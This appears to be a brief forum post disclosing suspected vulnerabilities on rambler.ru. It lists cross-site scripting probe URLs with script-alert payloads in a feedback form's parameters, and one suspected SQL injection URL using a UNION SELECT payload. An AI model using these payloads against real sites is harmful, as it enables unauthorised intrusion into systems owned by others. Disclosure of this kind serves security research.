CSS: 

http://www.rambler.ru/db/support/feedback.shtml?name=<script>javascript:alert('hello')</script> 
http://www.rambler.ru/db/support/feedback.shtml?subj=<script>javascript:alert('hello')</script> 
http://www.rambler.ru/db/support/feedback.shtml?message=<script>javascript:alert('helo')</script> 

Подозрение на SQL - Injection:

http://cards.rambler.ru/show_big.html?id=5191&s=46%20UNION%20SELECT%20null/*

http://www.rambler.ru/db/finance/othernews.html?src=117

Оставить мнение